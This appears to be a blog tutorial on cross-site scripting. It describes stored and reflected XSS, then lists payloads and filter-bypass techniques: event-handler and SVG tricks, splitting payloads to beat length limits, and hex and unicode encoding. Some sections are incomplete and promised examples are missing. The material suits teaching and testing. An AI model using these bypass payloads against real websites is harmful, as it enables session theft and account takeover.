What are types of Cross-Site Scripting vulnerability ?
Cross-site Scripting can be classified into three major categories — Stored XSS, Reflected XSS, and DOM-based XSS.
Stored Cross-Site Scripting (Persistent XSS) Vulnerability
Using session cookie, the attackers can gain access to the users account and can get easy access to the user’s personal information.
Reflected Cross-site scripting vulnerability
In a reflected XSS attack, the attacker’s payloads are majorly sent with the request itself. It is reflected in users browser with can response includes the payload given in the HTTP request. Reflected XSS is not persistent in nature hence attackers need to push the payload to every victim individually using any different ways such as social engineering. Attackers send link view emails or other delivery methods to send a payload to the user for gaining access to cookies or Session id’s.
Cross-site scripting (XSS) vulnerability Payloads Basics:
Example: <a onmouseover=alert('HERE ITS XSS')>I AM HERE </a>
Here, for the payload given below, as you can see, the img src tries to load an image called x, which is not present on web server hence the event gets triggered without any user interaction and alert XSS window will generate on page.
Example: <img src=x onerror=alert(String.fromCharCode(88,83,83));>
Below are few latest XSS Payloads:
- When we are not able to use event handlers in payloads due to applied proper validations we can use tags used in animations that is <animate>, here in below payload when we click on rectangle , it gets redirect to the google.com
|<svg><a><rect width=100% height=100% /><animate attributeName=href to=//google.com>|
- Email addresses are majorly we find in forms of different web applications and it only allow us for classic email format. It’s just matter of firstname.lastname@example.org order format being used for email input. The solution for passing the validation mechanism and achieving XSS is just to follow valid format. Here it is :
- At certain places. We have limit for the characters length, at that place we can divide payload to bypass character limit ;
|http://site.com/somefuntion.php?session=”oncut=” ‘&direct=true&from=true&r=select_down& plang=’ |alert|
- Hex Encoding :
Hex encoding can be applied in two formats :
- Format1 : \x[HEX]
- Base64 Encoding :
- Unicode encoding: Unicode is a Encoding standard contains UTF-8,UTF-16 and UTF-32 encodings which can be used to bypass XSS filter.
Payload <script>alert (document.domain)</script> will be encoded as : \\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e
Some interesting payloads are listed here:
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<img src ?itworksonchrome?\/onerror = alert(1)
<? foo="><x foo='?><script>alert(1)</script>'>">
<sCript x>(((confirm)))``</script x>
The XSS payloads can be generated according to the situations of HTML elements used in the application. If you have any doubts on the XSS you can comment on the below comment section.